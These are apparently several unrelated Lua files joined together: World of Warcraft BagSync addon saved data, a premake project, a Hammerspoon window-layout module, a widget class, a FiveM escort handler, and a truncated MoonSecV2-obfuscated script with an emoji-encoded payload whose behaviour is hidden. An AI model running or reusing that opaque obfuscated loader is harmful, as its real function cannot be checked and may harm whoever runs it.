["guild"] = "The Dainty Damsel",
["class"] = "WARRIOR",
["AH_Count"] = 3,
["AH_LastScan"] = 1496572195,
["auction"] = {
[0] = {
},
},
["faction"] = "Alliance",
["gold"] = 707678697,
["equip"] = {
[0] = {
nil, -- [1]
"122662::::::::::::1:582:::", -- [2]
nil, -- [3]
"2576", -- [4]
nil, -- [5]
"143582", -- [6]
"7062", -- [7]
"9820", -- [8]
[11] = "51992",
[13] = "122530::::::::::::1:582:::",
[12] = "51992",
[14] = "122361::::::::::::1:582:::",
},
},
["realm"] = "ArgentDawn",
["mailbox"] = {
[0] = {
},
},
["bank"] = {
[-1] = {
},
},
},
["Rochbert"] = {
["bag"] = {
[0] = {
"6948", -- [1]
},
},
["gold"] = 0,
["equip"] = {
[0] = {
[6] = "77509",
[7] = "72020",
[9] = "77526",
[5] = "72019",
[16] = "77279",
[17] = "77278",
},
},
["class"] = "MONK",
["faction"] = "Alliance",
["realm"] = "ArgentDawn",
},
["Rëmus"] = {
["bag"] = {
{
}, -- [1]
{
}, -- [2]
{
"54983", -- [1]
"54975", -- [2]
"55015", -- [3]
"55020", -- [4]
nil, -- [5]
"55006", -- [6]
"24589", -- [7]
"55019", -- [8]
"36272", -- [9]
"24682", -- [10]
"55000", -- [11]
"54981", -- [12]
"55002", -- [13]
"55009", -- [14]
nil, -- [15]
"55004", -- [16]
"129706", -- [17]
"4334", -- [18]
"116053,12", -- [19]
"4306,6", -- [20]
}, -- [3]
{
"6948", -- [1]
"110560", -- [2]
"122457", -- [3]
"1708", -- [4]
"54989", -- [5]
"55013", -- [6]
nil, -- [7]
"52942", -- [8]
"8181", -- [9]
"3189", -- [10]
"66247", -- [11]
"54986", -- [12]
"54991", -- [13]
"54979", -- [14]
nil, -- [15]
"58255", -- [16]
"24904", -- [17]
"54997", -- [18]
"55007", -- [19]
"54994", -- [20]
nil, -- [21]
"3214", -- [22]
}, -- [4]
[0] = {
"129717", -- [1]
"128959", -- [2]
"140192", -- [3]
"143785,5", -- [4]
"129711", -- [5]
"129712", -- [6]
"138771", -- [7]
"129703", -- [8]
},
},
["guild"] = "Blinkspeed Couriers",
["class"] = "HUNTER",
["AH_LastScan"] = 1487417454,
["auction"] = {
[0] = {
},
},
["realm"] = "ArgentDawn",
["faction"] = "Alliance",
["equip"] = {
[0] = {
nil, -- [1]
"129704", -- [2]
"129714", -- [3]
nil, -- [4]
"129709", -- [5]
"129715", -- [6]
"129713", -- [7]
"129710", -- [8]
"129716", -- [9]
nil, -- [10]
"138450::::::::::::1:3387:::", -- [11]
"129707", -- [12]
"129705", -- [13]
"129708", -- [14]
},
},
["gold"] = 678034,
["AH_Count"] = 0,
["mailbox"] = {
[0] = {
},
},
},
},
}
BagSyncOpt = {
["enableCrossRealmsItems"] = true,
["tooltipOnlySearch"] = false,
["enableMailbox"] = true,
["enableFaction"] = true,
["enableGuild"] = true,
["dbversion"] = "10.9",
["enableTooltipItemID"] = false,
["enableUnitClass"] = false,
["enableMinimap"] = true,
["enableAuction"] = true,
["showGuildNames"] = false,
["enableTooltips"] = true,
["enableLoginVersionInfo"] = true,
["enableRealmShortName"] = false,
["showTotal"] = true,
["colors"] = {
["total"] = {
["r"] = 0.956862745098039,
["g"] = 0.643137254901961,
["b"] = 0.376470588235294,
},
["guild"] = {
["r"] = 0.396078431372549,
["g"] = 0.72156862745098,
["b"] = 0.752941176470588,
},
["cross"] = {
["r"] = 1,
["g"] = 0.490196078431373,
["b"] = 0.0392156862745098,
},
["bnet"] = {
["r"] = 0.207843137254902,
["g"] = 0.533333333333333,
["b"] = 1,
},
["first"] = {
["r"] = 0.501960784313726,
["g"] = 1,
["b"] = 0,
},
["itemid"] = {
["r"] = 0.32156862745098,
["g"] = 0.827450980392157,
["b"] = 0.525490196078431,
},
["second"] = {
["r"] = 1,
["g"] = 1,
["b"] = 1,
},
},
["enableTooltipGreenCheck"] = true,
["enableBNetAccountItems"] = false,
["enableRealmAstrickName"] = false,
["enableTooltipSeperator"] = true,
["enableRealmIDTags"] = true,
}
BagSyncGUILD_DB = {
["Draenor"] = {
},
["Stormscale"] = {
},
["ArgentDawn"] = {
["Blinkspeed Couriers"] = {
"10938,2", -- [1]
"104241", -- [2]
"104244", -- [3]
"32747", -- [4]
"32737", -- [5]
"108996", -- [6]
"11083,2", -- [7]
"11139,7", -- [8]
"7453", -- [9]
"11138,5", -- [10]
"72988,23", -- [11]
"32749", -- [12]
"82328", -- [13]
"12363", -- [14]
"11137,10", -- [15]
"11176", -- [16]
"15259", -- [17]
"3740", -- [18]
"3039", -- [19]
"3198", -- [20]
"15259", -- [21]
"15249", -- [22]
"15230", -- [23]
"33430", -- [24]
"15912", -- [25]
"3039", -- [26]
"15269", -- [27]
"3039", -- [28]
"15224", -- [29]
"15223", -- [30]
"790", -- [31]
"36585", -- [32]
"6383", -- [33]
"6586", -- [34]
"6595", -- [35]
"3066", -- [36]
"6577", -- [37]
"6586", -- [38]
"9811", -- [39]
"3202", -- [40]
"9803", -- [41]
"12007", -- [42]
"36422", -- [43]
"12007", -- [44]
"11993", -- [45]
"4998", -- [46]
"4710", -- [47]
"6571", -- [48]
"13083", -- [49]
"3057", -- [50]
"3057", -- [51]
"25003", -- [52]
"6568", -- [53]
"6553", -- [54]
"6568", -- [55]
"9794", -- [56]
"6604", -- [57]
"9794", -- [58]
"9805", -- [59]
"6381", -- [60]
"9796", -- [61]
"4709", -- [62]
"9817", -- [63]
"6382", -- [64]
"6382", -- [65]
"90769", -- [66]
"14172", -- [67]
"82153", -- [68]
"118899", -- [69]
"56046,2", -- [70]
"115353,8", -- [71]
"102543,3", -- [72]
"32897,10", -- [73]
"127856", -- [74]
"5976", -- [75]
"83156,2", -- [76]
"102542", -- [77]
},
},
}
BagSyncCURRENCY_DB = {
["Draenor"] = {
["Jyggen"] = {
["Ancient Mana"] = {
["icon"] = "Interface\\Icons\\inv_misc_ancient_mana",
["header"] = "Legion",
["count"] = 265,
},
["Ironpaw Token"] = {
["icon"] = "Interface\\Icons\\inv_relics_idolofferocity",
["header"] = "Miscellaneous",
["count"] = 0,
},
["Nethershard"] = {
["icon"] = "Interface\\Icons\\inv_datacrystal01",
["header"] = "Legion",
["count"] = 23,
},
["Valor"] = {
["icon"] = "Interface\\Icons\\pvecurrency-valor",
["header"] = "Dungeon and Raid",
["count"] = 2400,
},
["Lesser Charm of Good Fortune"] = {
["icon"] = "Interface\\Icons\\inv_misc_coin_18",
["header"] = "Unused",
["count"] = 36,
},
["Garrison Resources"] = {
["icon"] = "Interface\\Icons\\inv_garrison_resource",
["header"] = "Warlords of Draenor",
["count"] = 4330,
},
["Order Resources"] = {
["icon"] = "Interface\\Icons\\inv_orderhall_orderresources",
["header"] = "Legion",
["count"] = 2703,
},
["Artifact Fragment"] = {
["icon"] = "Interface\\Icons\\inv_ashran_artifact",
["header"] = "Warlords of Draenor",
["count"] = 4,
},
["Tol Barad Commendation"] = {
["icon"] = "Interface\\Icons\\achievement_zone_tolbarad",
["header"] = "Player vs. Player",
["count"] = 3,
},
["Mote of Darkness"] = {
["icon"] = "Interface\\Icons\\spell_shadow_sealofkings",
["header"] = "Cataclysm",
["count"] = 6,
},
["Warforged Seal"] = {
["icon"] = "Interface\\Icons\\inv_arcane_orb",
["header"] = "Unused",
["count"] = 0,
},
["Mogu Rune of Fate"] = {
["icon"] = "Interface\\Icons\\archaeology_5_0_mogucoin",
["header"] = "Unused",
["count"] = 0,
},
["Elder Charm of Good Fortune"] = {
["icon"] = "Interface\\Icons\\inv_misc_coin_17",
["header"] = "Unused",
["count"] = 3,
},
["Epicurean's Award"] = {
["icon"] = "Interface\\Icons\\INV_Misc_Ribbon_01",
["header"] = "Miscellaneous",
["count"] = 22,
},
["Oil"] = {
["icon"] = "Interface\\Icons\\garrison_oil",
["header"] = "Warlords of Draenor",
["count"] = 170,
},
["Sightless Eye"] = {
["icon"] = "Interface\\Icons\\achievement_reputation_kirintor_offensive",
["header"] = "Legion",
["count"] = 330,
},
["Timeless Coin"] = {
["icon"] = "Interface\\Icons\\timelesscoin",
["header"] = "Mists of Pandaria",
["count"] = 59563,
},
["Essence of Corrupted Deathwing"] = {
["icon"] = "Interface\\Icons\\inv_elemental_primal_shadow",
["header"] = "Cataclysm",
["count"] = 0,
},
["Apexis Crystal"] = {
["icon"] = "Interface\\Icons\\inv_apexis_draenor",
["header"] = "Warlords of Draenor",
["count"] = 29603,
},
["Darkmoon Prize Ticket"] = {
["icon"] = "Interface\\Icons\\inv_misc_ticket_darkmoon_01",
["header"] = "Miscellaneous",
["count"] = 41,
},
["Mark of the World Tree"] = {
["icon"] = "Interface\\Icons\\inv_misc_markoftheworldtree",
["header"] = "Cataclysm",
["count"] = 22,
},
["Seal of Tempered Fate"] = {
["icon"] = "Interface\\Icons\\ability_animusorbs",
["header"] = "Warlords of Draenor",
["count"] = 11,
},
["Seal of Inevitable Fate"] = {
["icon"] = "Interface\\Icons\\achievement_battleground_templeofkotmogu_02_green",
["header"] = "Warlords of Draenor",
["count"] = 0,
},
["Champion's Seal"] = {
["icon"] = "Interface\\Icons\\Ability_Paladin_ArtofWar",
["header"] = "Wrath of the Lich King",
["count"] = 21,
},
["Curious Coin"] = {
["icon"] = "Interface\\Icons\\inv_misc_curiouscoin",
["header"] = "Legion",
["count"] = 1,
},
},
},
["ArgentDawn"] = {
["Isabèllá"] = {
["Timewarped Badge"] = {
["icon"] = "Interface\\Icons\\pvecurrency-justice",
["header"] = "Dungeon and Raid",
["count"] = 25,
},
},
["Picaboo"] = {
["Ironpaw Token"] = {
["icon"] = "Interface\\Icons\\inv_relics_idolofferocity",
["header"] = "Miscellaneous",
["count"] = 1,
},
["Darkmoon Prize Ticket"] = {
["icon"] = "Interface\\Icons\\inv_misc_ticket_darkmoon_01",
["header"] = "Miscellaneous",
["count"] = 4,
},
["Lesser Charm of Good Fortune"] = {
["icon"] = "Interface\\Icons\\inv_misc_coin_18",
["header"] = "Mists of Pandaria",
["count"] = 3,
},
["Brawler's Gold"] = {
["icon"] = "Interface\\Icons\\inv_misc_coin_17",
["header"] = "Legion",
["count"] = 10,
},
["Timewarped Badge"] = {
["icon"] = "Interface\\Icons\\pvecurrency-justice",
["header"] = "Dungeon and Raid",
["count"] = 200,
},
["Mote of Darkness"] = {
["icon"] = "Interface\\Icons\\spell_shadow_sealofkings",
["header"] = "Cataclysm",
["count"] = 5,
},
},
["Isabèllé"] = {
["Garrison Resources"] = {
["count"] = 618,
["icon"] = "Interface\\Icons\\inv_garrison_resource",
["header"] = "Warlords of Draenor",
},
["Brawler's Gold"] = {
["count"] = 70,
["icon"] = "Interface\\Icons\\inv_misc_coin_17",
["header"] = "Legion",
},
},
["Velouría"] = {
["Brawler's Gold"] = {
["icon"] = "Interface\\Icons\\inv_misc_coin_17",
["header"] = "Legion",
["count"] = 423,
},
},
["Rëmus"] = {
["Garrison Resources"] = {
["count"] = 771,
["icon"] = "Interface\\Icons\\inv_garrison_resource",
["header"] = "Warlords of Draenor",
},
},
},
}
BagSyncPROFESSION_DB = {
["Draenor"] = {
["Jyggen"] = {
{
["name"] = "Tailoring",
["level"] = 721,
}, -- [1]
{
["name"] = "Enchanting",
["level"] = 718,
}, -- [2]
{
["name"] = "Archaeology",
["level"] = 475,
}, -- [3]
{
["name"] = "Fishing",
["level"] = 624,
}, -- [4]
{
["name"] = "Cooking",
["level"] = 613,
}, -- [5]
{
["level"] = 600,
["name"] = "First Aid",
["recipes"] = "172540|172542|172541|172539|102699|102698|102697|88893|74558|74557|74556|45546|45545|27033|27032|18630|18630|18629|18629|10841|10841|10840|10840|7929|7929|7928|7928|3278|3278|3277|3277|3276|3276|3275|7935|7934|7934",
}, -- [6]
},
},
["ArgentDawn"] = {
["Isabèllá"] = {
},
["Flöyd"] = {
},
["Isabèllé"] = {
},
["Keestra"] = {
},
["Picaboo"] = {
},
["Thure"] = {
},
["Saelbes"] = {
},
["Velouría"] = {
},
["Rochbert"] = {
},
["Rëmus"] = {
},
},
}
BagSyncBLACKLIST_DB = {
["Draenor"] = {
},
["Stormscale"] = {
},
["ArgentDawn"] = {
},
}
BagSync_REALMKEY = {
["Draenor"] = "Draenor",
[0] = {
["Draenor"] = {
"Draenor", -- [1]
},
["ArgentDawn"] = {
"ArgentDawn", -- [1]
},
},
["ArgentDawn"] = "Argent Dawn",
}
|
--ImEditor Project
project "ImEditor"
kind "WindowedApp"
language "C#"
targetdir ("%{wks.location}/bin/" .. outputdir .. "/%{prj.name}")
objdir ("%{wks.location}/bin-obj/" .. outputdir .. "/%{prj.name}")
flags {
"WPF"
}
files {
"src/**.cs",
"src/**.xaml"
}
links {
"Microsoft.Csharp",
"PresentationCore",
"PresentationFramework",
"System",
"System.Core",
"System.Data",
"System.Data.DataSetExtensions",
"System.Xaml",
"System.Xml",
"System.Xml.Linq",
"System.Runtime.Serialization",
"System.Numerics",
"WindowsBase",
}
|
local gridConfig = '6x6'
local gridStack = {}
local registeredLayouts = {}
local activeHotkeyBindings = {}
local menubarIcon
local menuItems
--- Save a specific grid configuration for later use
-- @param string newGridConfig
--
local function saveGridConfig(newGridConfig)
gridConfig = newGridConfig
end
--- Return the currently save grid config
-- @return string
--
local function getGridConfig()
return gridConfig
end
--- Restore the latest grid configuration active before the last `pushGrid`
--
local function popGrid()
local poppedElement = table.remove(gridStack)
if poppedElement == nil then
return
end
hs.grid.setGrid(poppedElement, nil, nil)
end
--- Push the given grid onto the stack and activate it
-- @param gridGeometry
--
local function pushGrid(gridGeometry)
local currentGrid = hs.grid.getGrid()
table.insert(gridStack, currentGrid)
hs.grid.setGrid(gridGeometry, nil, nil)
end
--- Move all windows of a specific application to the given grid position on the given screen
-- @param string appName
-- @param hs.geometry gridGeometry
-- @param hs.screen screen
--
local function moveWindowsByApplication(appName, gridGeometry, screen)
local app = hs.appfinder.appFromName(appName)
if app == nil then
return
end
local windows = app:allWindows()
if next(windows) == nil then
return
end
pushGrid(getGridConfig())
for index, window in ipairs(windows) do
local realWindowLocation = hs.grid.getCell(gridGeometry, screen)
window:move(realWindowLocation)
end
popGrid()
end
--- Add a specific layout with a given name to the system
---
-- @param string name
-- @param table apps
-- @param string|nil hotkey
-- @param string|nil icon
--
local function addLayout(name, apps, hotkey, icon)
table.insert(registeredLayouts, {
name = name,
apps = apps,
hotkey = hotkey,
icon = icon,
})
end
--- Check if the layout with the given name is registered
-- @param string name
--
local function isLayoutRegistered(name)
for index, layout in ipairs(registeredLayouts) do
if layout.name == name then
return true
end
end
return false
end
local function getLayoutByName(name)
for index, layout in ipairs(registeredLayouts) do
if layout.name == name then
return layout
end
end
return nil
end
--- Activate a registered layout by its name
-- @param string name
--
local function activateLayout(name)
if not isLayoutRegistered(name) then
return
end
local layout = getLayoutByName(name)
for index, app in ipairs(layout["apps"]) do
moveWindowsByApplication(app["name"], app["grid"], app["screen"])
end
end
--- Initialize and load the Menubar Icon to be used
-- @return hs.image
--
local function loadMenubarIcon()
local iconPath = hs.configdir .. "/windowLayouts/icons"
return hs.image.imageFromPath(iconPath .. "/window-restore.pdf"):setSize({ w = 16, h = 16 })
end
--- Initialize and show the menubar icon for switching between layouts
--
local function initMenubarIcon()
menubarIcon = hs.menubar.new()
menubarIcon:setIcon(loadMenubarIcon())
menubarIcon:setMenu(function()
return menuItems
end)
end
--- Update the menuItemsInformation and redraw the menu
--
local function updateMenuIcons()
local menubarEntries = {}
for index, layout in ipairs(registeredLayouts) do
local displayString = layout["name"]
if layout["hotkey"] ~= nil then
displayString = displayString .. " (" .. layout["hotkey"]["mods"] .. layout["hotkey"]["key"] .. ")"
end
table.insert(menubarEntries, {
title = displayString,
image = layout["icon"],
fn = function()
activateLayout(layout["name"])
end
})
end
menuItems = menubarEntries
end
local function deregisterAllActiveHotkeys()
for index, binding in ipairs(activeHotkeyBindings) do
binding:delete();
end
activeHotkeyBindings = {}
end
--- Register and activate a specific hotkey
-- @param hotkey
-- @param layoutName
--
local function activateHotkey(hotkey, layoutName)
local binding = hs.hotkey.bind(hotkey["mods"],
hotkey["key"],
layoutName,
nil,
function()
activateLayout(layoutName)
end,
nil)
table.insert(activeHotkeyBindings, binding)
end
--- Update all the registered hotkeys corresponding to layouts
--
local function updateHotkeys()
deregisterAllActiveHotkeys()
for index, layout in ipairs(registeredLayouts) do
if layout["hotkey"] ~= nil then
activateHotkey(layout["hotkey"], layout["name"])
end
end
end
-- Public interface
local windowLayouts = {}
--- Initialize the module using a specific grid configuration
-- This function needs to be called before calling anything else related to this module
-- @param string gridConfig
--
windowLayouts.initialize = function(gridConfig)
saveGridConfig(gridConfig)
initMenubarIcon()
updateMenuIcons()
updateHotkeys()
end
--- Register a new layout with the system, which is displayed in the corresponding menubar menu
-- @param table apps
-- @param string|nil hotkey
-- @param string|nil icon
--
windowLayouts.registerLayout = function(name, apps, hotkey, icon)
addLayout(name, apps, hotkey, icon)
updateMenuIcons()
updateHotkeys()
end
return windowLayouts
|
Label = Widget:subclass("Label")
function Label:initialize(name, x, y, text, color)
Widget.initialize(self, name, x, y, 0, 0)
self.text = text
self.color = color
self.scale = 1
end
function Label:createComponents(bridge)
self.components[1] = bridge.addText(self.x, self.y, self.text, self.color)
end
function Label:setText(text)
self.text = text
self.components[1].setText(self.text)
end
function Label:setColor(color)
self.color = color
self.components[1].setColor(self.color)
end
function Label:setTextScale(scale)
self.scale = scale
self.components[1].setScale(scale)
end
function Label:setObjectAnchor(horizontal, vertical)
self.components[1].setObjectAnchor(horizontal, vertical)
end
|
Escort = {
players = {},
}
--[[ Functions: Escort ]]--
function Escort:Start(source, target)
self.players[target] = source
TriggerClientEvent("players:escort", target, source)
return true
end
function Escort:Stop(source)
self.players[source] = nil
TriggerClientEvent("players:escort", source)
return true
end
--[[ Events: Net ]]--
RegisterNetEvent("players:escort", function(target)
local source = source
-- Check cooldown.
if not PlayerUtil:CheckCooldown(source, 1.0) then return end
PlayerUtil:UpdateCooldown(source)
-- Check target.
if target ~= nil and (type(target) ~= "number" or target <= 0) then return end
-- Check ped.
if target then
local ped = GetPlayerPed(target)
if not ped or not DoesEntityExist(ped) then
return
end
end
-- Following logic.
local following = target and Escort.players[target]
if target and following == source and Escort:Stop(target) then
exports.log:Add({
source = source,
target = target,
verb = "stopped",
noun = "escort",
})
elseif not target and Escort:Stop(source) then
exports.log:Add({
source = source,
target = target,
verb = "left",
noun = "escort",
})
elseif Escort:Start(source, target) then
exports.log:Add({
source = source,
target = target,
verb = "started",
noun = "escort",
})
end
end)
|
_WkPztGXEh9Pyk0ME, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'
,nil,nil;(function() _msec=(function(_,__,_l)local __l__l=__[(-#"mer is white"+(0xf0-150))];local _l___l=_l[_[(1434-0x2e8)]][_[(-#{'nil';(function()return('o0l8I8'):find("\108")end)(),(function()return('o0l8I8'):find("\108")end)(),kernel32dII}+714)]];local _l___=(7+-#{{},",",'}',(function()return('CMBi8R'):find("\11")end)();(function()return('CMBi8R'):find("\11")end)();nil,kernel32dII})/((168+(-38+-0x26))-0x5a)local _l__l=((4048/((-#"guys im from the future v6 will completely hide your script by returning empty file"+((0x2bf4-5659)/119))+0x121))+-#'Bye bye :wave:')-(3+-#{113,78,nil})local _ll_ll=_l[_[(-#"Fun and games until a = (function() a() end) a()"+(0x1c5-249))]][_[(225+-#{'nil';1;nil;kernel32dII})]];local ____l=(-#'moons.ec/purchase'+(((-79+0xb)+211)-125))+((-0x2c+84)+-#'Broo u/thatHEXdude slapped this server')local __l_l=_l[_[(0x2541/17)]][_[(0x74c-980)]]local _ll=(0x20/16)-(((312-0xc2)+-0x30)/0x46)local _l_l_=(-#[[heres a hint: repeat until nil]]+(0xfac/(123+-#{(function()return('0ill0I'):find("\108")end)();(function()return('0ill0I'):find("\108")end)();(function()return('0ill0I'):find("\108")end)(),(function()return{','}end)();{};nil})))local __l__=((0x50+(((0x110d/97)-0x33)+-#[[moonsec top]]))-59)local __ll_=(-#{'}','nil';1;{}}+8)local _ll__=((0x74-(((-#{14,kernel32dII;(function(_)return _ end)()}+252)+-121)+-#"1 plus 1 doesnt equal 111"))+-#'im gay?')local ___l_=(-#[[gay person has currently attempted cracking of the century]]+((198+-#{1,",",{}})-0x85))local _lll_=(-#[[Federla is good at coding]]+(140-(-45+(((-#"steancommunityru.ru/scamlinkhere"+(638-0x150))+-91)+-#[[i still hate noobmaster]]))))local ___=((((((-7712/0xf1)+-0x5)+54)+-21)+-#[[Searching for the wrapper function]])+40)local ___l=((((-0x7c+(0x1b8+(-172+0x44)))+-#[[hi paster]])-0x9e)+-#[[you have failed the script logging speedrun]])local _lll=(8+-#{(function()return{','}end)();'}',51;",";47,'}'})local _ll_=((170-((((124762-0xf3be)-31200)/196)+-#[[mom shot dad]]))+-#"federal is an asshole")local _ll_l=((-#{",",",",107,'nil',1,'nil'}+126)-0x76)local _l__=(-#{1;(function()return('1NMMIN'):find("\77")end)(),'nil';(function()return{','}end)();nil;(function(_)return _ end)(),(function(_)return _ end)()}+6)local ___ll=(-#{",",(function()return('l1E8lC'):find("\69")end)();{};'nil';159,nil;(function()return('R8NiIi'):find("\16")end)()}+8)local __ll=(-90+((177+-#{1;{};1})+-81))local _llll=((0x2c4+((-0x35778/25)/146))/216)local ____=(5+-#{1;'nil',(function()return('III0Ni'):find("\1")end)();(function()return('III0Ni'):find("\1")end)()})local __lll=(((((11831+-0x3c)+-#[[daddy chill]])/49)-0x8a)+-0x63)local _l_ll=(-#[[Before you marry someone make them use a computer with slow internet to see who they really are]]+(0x140-(-#"table.concat = nil"+(276+((-#'free nitro real?!'+(0xa5-95))-0x59)))))local _l_l_l=_[(1397+-0x21)];local __ll_l=_l[_[(-#{119;(function()return{','}end)(),(function()return{','}end)()}+159)]][_[(496+-0x4f)]];local ___l_l=_l[(function(_)return type(_):sub(1,1)..'\101\116'end)('��🤣🤣��')..'\109\101'..('\116\97'or'�🤣���🤣').._[((23000/(174-0x86))+-#'PSU Protected!')]];local _l_lll=_l[_[(-#"moonsec pls add fivem choice"+(0x1702/10))]][_[(973+-#{55,55;32;kernel32dII,(function(_)return _ end)()})]];local __llll=(-#'Bye bye :wave:'+(108-0x5c))-((0x95+(-0x3fc0/160))+-0x2d)local _lllll=((-0x69+(0xfd+(-#[[moonsec top]]+(-59+-0x15))))+-#'can someone send me the psu source code it got deletedd')-(-125+0x7f)local ____ll=_l[_[(267+-0x6f)]][_[(-#{38;",",(function()return{','}end)();(function()return{','}end)(),(function()return('iRHH1I'):find("\19")end)();(function()return('iRHH1I'):find("\19")end)()}+360)]];local _l_=function(_,_l)return _.._l end local ___lll=(-#"ok. how about constants that dump themselves"+(0x4f+-31))*((0xae+(0x24+-110))/25)local _lll_l=_l[_[(-#[[somebody play minecraft with lerebox please hes so lonely]]+(-0x38+1235))]];local __l_=((114+-0x54)+-#'Yeah this is getting cringe-')*(24832/(-118+(-#"Spoiler: You will fail."+((1487-0x319)-0x167))))local _l__ll=(-0x2f+1071)*(0x41-(167+(-0x62b8/243)))local _ll__l=(230-((565-0x123)+-96))local _____=((232-(22240/0xa0))+-0x5b)*(-0x56+88)local _l_l=_l[_[(0x13319/77)]]or _l[_[(12903/0x17)]][_[(0x13319/77)]];local __l=((-#'totally obfuscated with luraph'+(((0x1c5dd9ac/174)+-#'brick luke deez nuts')/205))/52)local _=_l[_[((-0x66+1336)+-#[[balls in ur jawz]])]];local __l_ll=(function(_l_)local ___,__=4,0x10 local _l={j={},v={}}local __l=-_ll local _=__+_l__l while true do _l[_l_:sub(_,(function()_=___+_ return _-_l__l end)())]=(function()__l=__l+_ll return __l end)()if __l==(___lll-_ll)then __l=""__=__llll break end end local __l=#_l_ while _<__l+_l__l do _l.v[__]=_l_:sub(_,(function()_=___+_ return _-_l__l end)())__=__+_ll if __%_l___==__llll then __=_lllll _l_lll(_l.j,(____ll((_l[_l.v[_lllll]]*___lll)+_l[_l.v[_ll]])))end end return __l_l(_l.j)end)("..:::MoonSec::..😀😃😄😁😆😅🤣😂🙂🙃😉😊😇😝🤪😜😃😜😆😂😝😆🤣😁🤪😉🙂😂😃😀🙃😜😄🤪😀🙂🤪😀😊🤣🤣😇😅😀😁😅😀😜😊😉😁😅😇😆😅😁😄😉😝😆😅😃😝🙃🤣😁🤪😁😂😁🤪🙃😄🙃😝😊😂😆😀🤣😂🤪😇😄😂😉😃😆🙃😉😃😊😉😂😄😆😝😅😉😁😄😇😊😊😆😉😅🤪😀😅😊😅😅😅🤪😊😜😊😇🙃😇🙂😅😃🤪😀🤣😜😝😆😆🙃😄😀😄😄😄🤪😅😉😅😊🤪😜😂🤣😀😅🙃😆😂🤣😃😅😊😁😁😅😇😝😁😅😜😄😂😅🙃😁😁😀😊🙃😆🙂😝😂😜😄😜🤣😅😂😁😇🙃🤪😁😃🙂😂😅😅😝🤪🤣😝😜😇😄😀😊🙃😄😊😆😝😝🙂😄😝😆😉😂😉😀😁🙃😄😄😃😆😄😄😁😂😇🤣😆😝😁😇😄🤣🤪🙃🙃😄🙂😊😂😆🤣😝😅🤣😆😄🤣😇😄😉😂😉😁😄😜😊🤪😆😝😄🙃😇😇🤣😉🙂😇😃🤪😉😂😁🤣😇😅🤪😅😄🤣😜😅😝😊🤪😀😅😜😊😃😆🙂😇😇😅😊🤪😉😝😇😂😀😜😇🙂🙃😄😀😉😂😁😆😇🤪😅😝🤪😅🙂😃🤣😆😄😝😊😇😆😊😝😉🤣🙃😜🙂😝😂😅🤣🤣😇😁😉😇😁😅😄🤪😃🙃😝😇😊😃😀😆😀😝😅😄😜🤣😀🤣😁🤪🙂😂😂😀🤣🤪😆😅😄😊🙂😀😄🤣😝😇😅😃😁🤣🙂😇😉😄🙂🙃😀😊😜😆🙃😝🙂🤣😂😁🙃🤪😝😂🙃😃🤣😉🤣😄🤣😅🙂😝😜🤣🤪😜😝😝😃😂🙂🤪😉🤣😁🤪😀😅🤣🤪😄😅😊🙃😉😉😁😄😄😊😃😆😀😄😅🙃😊😃🙂😂🤪🤪😝😅😇😊😉🤪🙃😉😃😊😉😅😅🤪😂😅😄😊😀😃😜🙃🤣🙂🤣😅😆😝😝🤣😇😜😊😂🤪🤣😁😀😀😁😀😆🤣😜😅🤪😂😉😉😀😄🙃😃😄😀🤪😀😃😝😅🙂🙃😝😝😄😀😆😅😂🙂🤪😇😜😃😃😆😉🙂🙂😇🙂😀🙂😆🤣🙂😃😊😉🤪😇😁😝😂😇😊😜😜😄😁😂😂😀😉🤪🤪😇😄😝🤣🙃😉😄😝😆😄😁😅😇🙂🤪😝😇😃🤣😆🙂🙃🤣😝😀😀😄😅😀🙂😉😊😇😀😊😆😆😂🤣😇😆😜🤪😁😀😂🤪😊🙂🤪😉😁🙂😂😄😉😆😜😁😇😝😀😂🙂🤣😃😅😉😆😂😁🤪😀😃🙂😆😇😁🤣🙃😊🤪😝😄😄🤣😇😉😃🙂😇😜🙂😆🤪😂😇😊😇😜😅🤪😉😊🙂😆😃😝😀😅😜🤣🤪🙂😜🤣😊😀😊😉😜😝😇😆😊🤪😂🤣🤣😜😅🙂😆😅😁😇😜😃🙃😅😃😉😝🤪😝😄😜🙂🤣🙂🙃😃😜😃🤣🙂😃😜😇😆😃🙂😝😝😉😇🙃🙃😄😄😃😊😀😁😜😇🤪😅😝😁😂😊😊😉😀😉😄😄🙂😊😂😆🤣😃🙂😇😇😅😆😜😆😂😄😀😁😉😁😄😁😊😜😝😆😂😃😜😉🙂🙃😃🙂😇😜🤣😂😃😆😅😁😇😀🤣🤪😜🙃🙃😆😃😜😉🤪😁😝😃😆😇😀😆😊😝😝😀😊🙃😝😄🤣😊😅😆😆😃😅😊😊😁😁😉😄😃😊😉🙂😜😆😇😄😆😊😝😉🤣🙃😃🙃😄😉😃😉😃😂🤪😅😇🤣😃🙃🤪😂😂😀😜😜🙂🤪🤣😉😇😆😜😃😁😊🤣🙃😉😇😂😉😀😝🙃😅😄😆😊😁🙃😄😁😝😇😃🤣🙂🤪😁😂😜😀😜🙃😀😇😆😆🙃😝🙂🤣😂😆🙂😇🙃😄😄🙃😂😉😝😁😇😇😀😄😝🙂🤪😜🤪😇😀😃😇😉😉😁🙃😇🙂😇😂🤪🙃🙂😄😀😆🙃😁😄😄😀😁🙃😝😀😜🙃😝😇😇😂😆😃😂🙃🙃😀😝🙃🙃😀😜🙃😉😃😃😄🙂🙂🙃😃😄😉😃😁😀🙃😉🤪😀😇😅🤣😁🤪😄😆🤪😂🤪😊😆😁😂😇🤣😅😅😄😝🤪😃😂🙂😀😀🙂😊😃😆🙃😃😁😄😇🤪🤣😃😝😜😂😊😄🤪😁😅😊🤣😆😅😝😆😊😇😇🙂😄😉🤣🤪😊😄😜😆😃😝😃😃😂🤣😇🙂😀😉😁😇🙂😄😉😜😇😊😀😆😅😁🤪😄😂😃😁😃😊😜😁😜😝😁😅😊🤪😄🤣😝🤪😜😂😝😀😆🙂😅😀😄🙃🙂😄😅😉😜😁😊😊😝😅😀😝😅🤣😁🤪😇😂😁😜😊😂😉😜😂🙃😆😄😄😉😂😄🙃😊😊😆😁😇🙃😅🙂😝😜🤣🙂🤪🤣🤣😁😜🙃🙂🤣😀😉🙂😂😄😀😉😅😄😄😊😊😆😀😊😝😅🤣😝😊😅🙂😜😄😂🤣😜😁🙂😇😃😃🙂🤪😄😂😉😇😄🙃😇😄😆😂😇😆😅😉🤪😂😅😅😆😜😝🤪🤣😝😜😇🙂😊🙃😉😜😉😂🙂🙂🤪🙃🤣🤪😅😂😆😀😁😊🤪😀😜🤣😄😉🙂🤪😜😆🤣🙂😇😝😊😄😃🤣😝😊🤪😀😃😆😃🙃😉🤪😜😁🙂😂😜😝😀😃🤪🤣😅😊😃😜😝😅😄🙃